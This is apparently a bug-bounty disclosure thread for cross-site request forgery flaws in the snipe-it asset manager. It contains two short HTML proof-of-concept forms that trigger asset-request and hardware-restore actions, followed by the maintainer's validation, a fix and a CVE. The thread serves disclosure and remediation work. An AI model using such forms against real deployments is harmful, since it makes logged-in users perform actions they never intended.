Cross-Site Request Forgery (CSRF) in snipe/snipe-it

Valid

Reported on

Oct 4th 2021


Description

I found some low/medium level CSRFs on nice snipe-it application

Proof of Concepts

change the state of Requestable Assets :

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://develop.snipeitapp.com/account/request-asset/{id}">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

restore a hardware :

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://develop.snipeitapp.com/hardware/{id}/restore">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 2 months ago
snipe
2 months ago

Maintainer


This really wouldn't apply here, since we have fine-grained permissions that wouldn't allow a logged in user to perform an action they weren't authorized to do anyway.

amammad modified their report
2 months ago
amammad
2 months ago

Researcher


The CSRF attack no need any permission

in this kind attack this is enough to a logged-in user with fine-grained permissions go to attacker website or click a link.

amammad
2 months ago

Researcher


Believe me I report near 200 CSRF vulnerabilities to many of repositories If you want more explanation just tell me my dear.

snipe
2 months ago

Maintainer


Please do not call me "dear". The logged in user would still have to have permission to execute the action that the form is requesting. It still has to talk to the server, and the server determines who has permission to do what.

snipe
2 months ago

Maintainer


Additionally, Laravel framework requires a CSRF token in order to process form requests, so I'm not sure how you'd even get anything other than a 500 error.

amammad
2 months ago

Researcher


I'm so sorry about 'dear', I'm not a pro in English.

First I want to sure that you already knows about CSRFs attacks ( excuse me about saying this )

a good reference :

https://portswigger.net/web-security/csrf

well, If a user that already have permission to execute the action Or even the admin or super user, go to attacker website or click on a crafted link then the action send to server as the user or admin or super user because the request sent to server with the user who had a permission.

snipe validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
amammad
2 months ago

Researcher


Thanks for validation, If you want to know more about my report just tell me and I will create a Video PoC.

if it is possibly tell me what can I call you in next times ?

Best regards.

snipe
2 months ago

Maintainer


No problem re: "dear" - but women in the US don't like to be called "dear" by strangers. It comes off as condescending.

I know what CSRFs are. This just doesn't seem very high risk, since the worst you can do is restore an asset that was deleted. In context, this isn't really that big of a risk.

We'll patch it anyway, but there's limited harm you could do.

snipe
2 months ago

Maintainer


Calling me by my name/handle would suffice, thanks for asking.

I should have a PR up shortly.

snipe
2 months ago

Maintainer


I have a PR up as a fix for this, but it will be on demo.snipeitapp.com (the master branch), not develop, which is considered unstable and not fit for production currently. The fix on master is still going through QA but should be out shortly.

snipe
2 months ago

Maintainer


This is now fixed on demo.snipeitapp.com. It will not appear on develop until the two branches are merged, which will not be for another few weeks, as develop is not stable and not meant for use in production under any circumstances.

snipe confirmed that a fix has been merged on 84c73a 2 months ago
snipe has been awarded the fix bounty
web.php#L40-L44 has been validated
Jamie Slome
a month ago

Admin


CVE published! 🎊